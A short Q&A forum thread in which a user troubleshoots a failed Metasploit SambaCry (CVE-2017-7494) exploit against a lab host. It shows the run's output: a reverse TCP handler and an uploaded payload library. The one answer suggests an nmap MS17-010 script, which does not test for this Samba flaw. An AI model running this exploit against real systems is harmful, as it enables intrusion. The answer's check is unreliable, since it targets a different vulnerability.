# unable to exploit samba cry valnurability using metasploit

Tags: metasploit

I am trying to exploit linux kernel vulnerability samba cry (CVE-2017-7494) for some research work using metasploit framework. But I get following error msf exploit(is_known_pipename) > run

```
[*] Started reverse TCP handler on 192.168.78.136:4444 
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the 
path#
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared
[*] 192.168.78.139:445 - Uploaded payload to 
\\192.168.78.139\myshare\BsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path 
/shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path  
/shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.
```

is it because my target host is not valnurable or any other issue? My target host has samba version- 3.6.23 which as far as I know is valnurable.

thanks

Answer (score 1):

Failed to load STATUS_OBJECT_NAME_NOT_FOUND means "The object name is not found."
Probably metasploit failed to upload the payload in the shared folder.
Can you try to execute nmap and verify the presence of the vulnerability?
The command is 
`nmap -p445 --script smb-vuln-ms17-010 TARGET_IP`